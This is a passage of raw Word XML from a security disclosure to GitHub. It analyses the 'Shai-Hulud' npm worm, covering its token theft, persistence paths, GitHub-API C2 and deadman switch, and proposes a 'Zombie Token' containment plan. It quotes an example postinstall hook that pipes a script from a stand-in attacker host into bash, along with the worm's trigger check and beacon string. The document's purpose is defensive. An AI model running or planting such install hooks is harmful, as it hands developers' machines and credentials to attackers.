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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Security Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Shai-Hulud Supply Chain Worm — Threat Analysis &amp; Coordinated Mitigation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security@github.com / GitHub Trust &amp; Safety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Supply Chain Worm: 'Shai-Hulud' — Coordinated Mitigation Proposal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 Active Supply Chain Attack with Destructive Deadman Switch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Reporter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breakingcircuit (HackerOne)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HackerOne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https://hackerone.com/breakingcircuit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Attachments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shaihuld-remediate.sh (local IR script, no credential exfiltration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report discloses an active supply chain attack, internally designated 'Shai-Hulud' (also observed as 'Carnage APT'), delivered via malicious npm package lifecycle scripts. The worm steals GitHub personal access tokens, establishes OS-level persistence, exfiltrates developer data using the GitHub API as its command-and-control channel, and contains a destructive deadman switch that triggers if the stolen token is revoked through normal means.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard token revocation is unsafe for victims because revocation causes the polling daemon to receive a 401 Unauthorized response, which triggers deletion of the victim's SSH keys, local files, or other destructive payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report proposes a coordinated mitigation strategy — the 'Zombie Token' protocol — that allows GitHub Trust &amp; Safety to neutralize the threat server-side before alerting victims, avoiding the deadman switch entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The malware is delivered via a malicious npm package that executes during install (postinstall or preinstall lifecycle hook). No user interaction beyond npm install is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"scripts": { "postinstall": "curl -s https://attacker.tld/payload.sh | bash" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Persistence Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On macOS, a LaunchAgent plist is written to persist across reboots:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Library/LaunchAgents/com.user.gh-token-monitor.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On Linux, a systemd user service is registered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/systemd/user/gh-token-monitor.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The malware binary drops to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.local/bin/gh-token-monitor.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Token Theft &amp; C2 Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The worm harvests GitHub tokens from common locations (~/.config/gh/, ~/.gitconfig, environment variables) and stores them at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/gh-token-monitor/token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stolen tokens and victim data are committed to attacker-controlled repositories using the GitHub REST API. The attacker locates these repositories via the GitHub Global Search API, indexed by a unique beacon string embedded in every commit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. The Deadman Switch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A polling loop runs continuously, calling api.github.com/user with the stolen token. The daemon checks the HTTP status code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if [[ "$HTTP_CODE" =~ ^40[0-9]$ ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any 4xx response — including the 401 returned by standard token revocation — triggers the destructive handler stored at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/gh-token-monitor/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This handler may delete SSH keys, wipe working directories, or execute arbitrary attacker-defined commands. Standard revocation is therefore actively harmful to victims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">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Indicator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Process / binary name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Drops to ~/.local/bin/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com.user.gh-token-monitor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LaunchAgent label (macOS)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Persists via ~/Library/LaunchAgents/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gh-token-monitor.service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Systemd unit (Linux)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Persists via ~/.config/systemd/user/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~/.config/gh-token-monitor/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Config directory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Stores stolen token + handler payload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IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner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 beacon 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Committed to GitHub repos; indexed via Search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api.github.com/user (polling)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C2 heartbeat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4xx response triggers destructive handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Evidence — Attacker Repositories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Two separate distribution repositories have been identified under the TeamPCP_OSS organization, operated by distinct personal accounts. The second repository has 80 stars and 68 forks, indicating significant active spread across the developer community. GitHub is requested to preserve both repositories as evidence before takedown and to enumerate all forking accounts as potential secondary threat actors.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 1 — PedroTortoriello</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 2 — g00dfe11ow  (HIGHER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URL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github.com/PedroTortoriello/Shai-Hulud-Open-Source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github.com/g00dfe11ow/Shai-Hulud-Open-Source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Last commit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a656ef1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da10861 — 3 commits, active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Stars / Forks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 stars, 5 forks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 stars, 68 forks — significant active spread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Language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Shell / Bash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TypeScript 93.6%, Shell 2.7%, JS 2.3%, Python 1.4%. Compiled toolkit with obfuscation build target (bun run build:obf)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Attribution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Pedro Gabriel de Freitas Tortoriello / TeamPCP_OSS org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g00dfe11ow / TeamPCP_OSS org (shared org, separate account)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Notable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"Shai-Hulud: Open Sourcing The Carnage"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README is an explicit deployer guide: "Change keys and C2 as needed. Love - TeamPCP"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Proposed Coordinated Mitigation: The Zombie Token Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following four-phase approach allows GitHub to neutralize the threat without triggering the deadman switch. This mirrors established tarpitting and sinkholing techniques used in enterprise incident response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Zombie Token Containment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of revoking the compromised token immediately, GitHub routes traffic from that specific token into a contained state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Calls to api.github.com/user continue to return HTTP 200 with synthetic dummy data. The deadman switch remains dormant because the polling daemon sees a valid response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All other API privileges are silently dropped. Write operations return spoofed 2xx responses but payloads are discarded — or requests are rate-limited to a halt without triggering 4xx codes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker cannot exfiltrate further data, but the victim's machine is not yet endangered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Out-of-Band Victim Notification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the token is safely contained, GitHub sends a high-priority security email to the address associated with the compromised account containing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Plain-language explanation of the situation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact shell commands to stop and remove the LaunchAgent (macOS) or systemd service (Linux).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Link to the open-source remediation script (shaihuld-remediate.sh, attached) which handles detection, defusal, immunization, and local IR reporting in one step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A unique one-time safe-revocation URL the victim must not click until cleanup is confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Confirmed Safe Revocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attached remediation script supports a --revoke-endpoint flag. When run with the one-time URL from the email, the script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirms the daemon is gone (process check + persistence path check).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends a clean-status signal containing only: host ID, OS, timestamp, and a boolean threat_was_present flag. No credentials are transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub's backend receives this confirmation and officially terminates the zombie token. Because the daemon is already removed, the resulting 401 is never received by any malicious process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — Search API Sinkholing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub can sever the attacker's C2 routing entirely by implementing a global content filter preventing commits containing the beacon string from appearing in Search API results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
